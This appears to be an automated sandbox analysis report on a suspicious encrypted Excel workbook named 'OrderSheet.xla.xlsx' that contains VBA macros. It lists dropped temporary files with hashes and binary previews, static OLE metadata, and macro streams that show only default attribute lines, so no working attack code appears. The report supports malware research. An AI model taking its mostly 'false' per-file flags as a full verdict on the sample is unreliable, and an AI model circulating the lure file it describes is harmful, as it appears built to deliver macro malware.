                            Entropy (8bit):5.39636080228608
                            Encrypted:false
                            SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbp:B3
                            MD5:2FFB3542CF6978625FB16F5973BCB41B
                            SHA1:4C0C2568DD75F7FB322647DB6F972740A9C37565
                            SHA-256:E9966537CF9BF51875DF699225DBFAFE3B05110BD10C5B6C8C7FD717FBCBBED9
                            SHA-512:49AE2B8921F5760DF3B19253B165883FF9F9DF6EEE0F91CD1FBB10E6D30FF8312C1AD655DE73CC7ACEE9F98C8AE253BC26663DA0C52E28796B45D51D44A585D6
                            Malicious:false
                            Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-

                            C:\Users\user\AppData\Local\Temp\acrocef_low\51f86ce4-2a41-4268-a01c-4572e99f7694.tmp

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                            Category:dropped
                            Size (bytes):758601
                            Entropy (8bit):7.98639316555857
                            Encrypted:false
                            SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                            MD5:3A49135134665364308390AC398006F1
                            SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                            SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                            SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                            Malicious:false
                            Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                            C:\Users\user\AppData\Local\Temp\acrocef_low\8ae55d9b-8c9a-4882-8623-f4c772d06df7.tmp

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                            Category:dropped
                            Size (bytes):1419751
                            Entropy (8bit):7.976496077007677
                            Encrypted:false
                            SSDEEP:24576:6DaWL07oXGZGwYIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:caWLxXGZGwZGh3mlind9i4ufFXpAXkru
                            MD5:7867DAFF192926A49EB7516D226D452F
                            SHA1:BD0B185B12DB865CEA23060A9789C6B2D814B62E
                            SHA-256:C7586BA81615BBAA63DA0D81CE18C0D087D1237500C99C35239A4D3CAEED2934
                            SHA-512:B556042E82056983EA6A69AEE0DAB370641437EF6239FD04676FC26EC9472C6E5EF6194885C165E3987E8019321DCD9B4A574EA7A6253AC3C9468434AEAA0C21
                            Malicious:false
                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                            C:\Users\user\AppData\Local\Temp\acrocef_low\aceb7a89-7530-4da5-b257-ec6f6e66a86e.tmp

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                            Category:dropped
                            Size (bytes):386528
                            Entropy (8bit):7.9736851559892425
                            Encrypted:false
                            SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                            MD5:5C48B0AD2FEF800949466AE872E1F1E2
                            SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                            SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                            SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                            Malicious:false
                            Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                            C:\Users\user\AppData\Local\Temp\acrocef_low\c016288d-f72a-4119-a9bf-12f6e49027b8.tmp

                            Download File
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                            Category:dropped
                            Size (bytes):1407294
                            Entropy (8bit):7.97605879016224
                            Encrypted:false
                            SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                            MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                            SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                            SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                            SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                            Malicious:false
                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                            C:\Users\user\AppData\Local\Temp\~DF36336C2AF2704FC6.TMP

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):114688
                            Entropy (8bit):5.960294683466808
                            Encrypted:false
                            SSDEEP:3072:BeCk3hbdlylKsgwyzcTbWhZFGkE+cLaxHAknovZaFhcW8PI9+:Bzk3hbdlylKsgwyzcTbWhZFVE+WaxHAt
                            MD5:F126C2A2D94FAA5319FAB0F9C46AA330
                            SHA1:A39928BA89A54A760062B319FB71769E6BED0BAD
                            SHA-256:C070BC5CC87787F76F665B652DC2311D1ACF7A00DF18353E205DB5DA7A953DFA
                            SHA-512:8FB0D68AE643F3BA20F2930D3EA396F49F7B967B5E57705B3710AC1046AC87B37965BAC453D8A3D9B0784CA960E0D3E60E69C221B6B98615121055CD18DB0D05
                            Malicious:false
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\~DFB4D918C4B838A39A.TMP

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\Desktop\FA440000

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 10 05:48:54 2024, Security: 1
                            Category:dropped
                            Size (bytes):798720
                            Entropy (8bit):7.637719943178928
                            Encrypted:false
                            SSDEEP:12288:egW+CJEUiOIBUzMTSvD3DERnLRmF8DmEPmxpsAQx1Zj+jHEPAymzDtL:WBaebARM8FA8Z+j2AymntL
                            MD5:BBD5B7ABB5DDCC0C0D6D732C2493A4CD
                            SHA1:90AAE4166734661A069E178739C179C68DD22B3C
                            SHA-256:D95142A19BD072AB691B2D45577078945CE588DF23B194AD1840B79B8B9BDA91
                            SHA-512:738492CA385358045A48573E4D6BC9E381C9FD79BE4058163796F2BD0AE92073EA51BA3722962B16ACFE83EDF8B16D7B808519DB3E356DFB2E9F892B4A3F4828
                            Malicious:false
                            Preview:......................>.......................................................@...A...B...C...p...q...r.......-.......................................................................................................................................................................................................................................................................................................................................................................................................................?...}...,........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>.......o...................E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                            C:\Users\user\Desktop\FA440000:Zone.Identifier

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0

                            C:\Users\user\Desktop\OrderSheet.xla.xls (copy)

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 10 05:48:54 2024, Security: 1
                            Category:dropped
                            Size (bytes):798720
                            Entropy (8bit):7.637719943178928
                            Encrypted:false
                            SSDEEP:12288:egW+CJEUiOIBUzMTSvD3DERnLRmF8DmEPmxpsAQx1Zj+jHEPAymzDtL:WBaebARM8FA8Z+j2AymntL
                            MD5:BBD5B7ABB5DDCC0C0D6D732C2493A4CD
                            SHA1:90AAE4166734661A069E178739C179C68DD22B3C
                            SHA-256:D95142A19BD072AB691B2D45577078945CE588DF23B194AD1840B79B8B9BDA91
                            SHA-512:738492CA385358045A48573E4D6BC9E381C9FD79BE4058163796F2BD0AE92073EA51BA3722962B16ACFE83EDF8B16D7B808519DB3E356DFB2E9F892B4A3F4828
                            Malicious:false
                            Preview:......................>.......................................................@...A...B...C...p...q...r.......-.......................................................................................................................................................................................................................................................................................................................................................................................................................?...}...,........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>.......o...................E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                            C:\Users\user\Desktop\~$OrderSheet.xla.xlsx

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):165
                            Entropy (8bit):1.5231029153786204
                            Encrypted:false
                            SSDEEP:3:sYp5lFltt:sYp5Nv
                            MD5:B77267835A6BEAC785C351BDE8E1A61C
                            SHA1:FABD93A92989535D43233E3DB9C6579D8174740E
                            SHA-256:3B222E766EADC8BC9A8A90AC32FA591F313545B7E8C5D481D378AE307FA798C3
                            SHA-512:FFFCBA958E9BD56F284DA19592F124C48B013FCDA2FBE65B3EB38BB644C2B0C978E6DAE99EF213B054813C7212E119B09236A6FFF342D32E52C84DD26DE1E033
                            Malicious:true
                            Preview:.user ..a.l.f.o.n.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                            Static File Info

                            General

                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 9 07:06:58 2024, Security: 1
                            Entropy (8bit):7.7617791884560114
                            TrID:
                            • Microsoft Excel sheet (30009/1) 47.99%
                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                            File name:OrderSheet.xla.xlsx
                            File size:1'071'616 bytes
                            MD5:f11d4f4a1c4b40a38a0d32a65b464853
                            SHA1:0bf28b871d1169fbbe565cf18b032f55f0479cae
                            SHA256:57d8d4a52a8ae466a911161272b5416bff18784c91fcf631e193a2cbc4376920
                            SHA512:5ae6de71b74a23587897afebaa4f6c814679d71c702b435cd59dc4d126241c12562c6d71b1e7b74a06cd5d41c5f3f0095a2e56b58cde6daa84ae090037a5b5b6
                            SSDEEP:24576:IBabbARM89X8Z+joLk/E/3XTIu6M1POdcN:IRRXXjoL/3o0POmN
                            TLSH:CC35F1D1B68DAB11DA55023575F3839E2720EC53E90252BB32F8B31E2AF76D08543F56
                            File Content Preview:........................>.......................................................@...A...B...C...p...q...r.........../...........d.......f......................................................................................................................

                            File Icon

                            Icon Hash:35e58a8c0c8a85b9

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "OrderSheet.xla.xlsx"

                            Indicators
                            Has Summary Info:
                            Application Name:Microsoft Excel
                            Encrypted Document:True
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:False
                            Flash Objects Count:0
                            Contains VBA Macros:True
                            Summary
                            Code Page:1252
                            Author:
                            Last Saved By:
                            Create Time:2006-09-16 00:00:00
                            Last Saved Time:2024-12-09 07:06:58
                            Creating Application:Microsoft Excel
                            Security:1
                            Document Summary
                            Document Code Page:1252
                            Thumbnail Scaling Desired:False
                            Contains Dirty Links:False
                            Shared Document:False
                            Changed Hyperlinks:False
                            Application Version:786432

                            Streams with VBA

                            VBA File Name: Sheet1.cls, Stream Size: 977
                            General
                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                            VBA File Name:Sheet1.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            VBA File Name: Sheet2.cls, Stream Size: 977
                            General
                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                            VBA File Name:Sheet2.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            VBA File Name: ThisWorkbook.cls, Stream Size: 985
                            General
                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                            VBA File Name:ThisWorkbook.cls
                            Stream Size:985
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            VBA File Name: Sheet1.cls, Stream Size: 977
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                            VBA File Name:Sheet1.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! q . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 21 8a 71 e9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            VBA File Name: Sheet2.cls, Stream Size: 977
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                            VBA File Name:Sheet2.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! 5 P . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 21 8a 35 50 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            VBA File Name: Sheet3.cls, Stream Size: 977
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                            VBA File Name:Sheet3.cls
                            Stream Size:977
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 21 8a c8 a9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            VBA File Name: ThisWorkbook.cls, Stream Size: 985
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
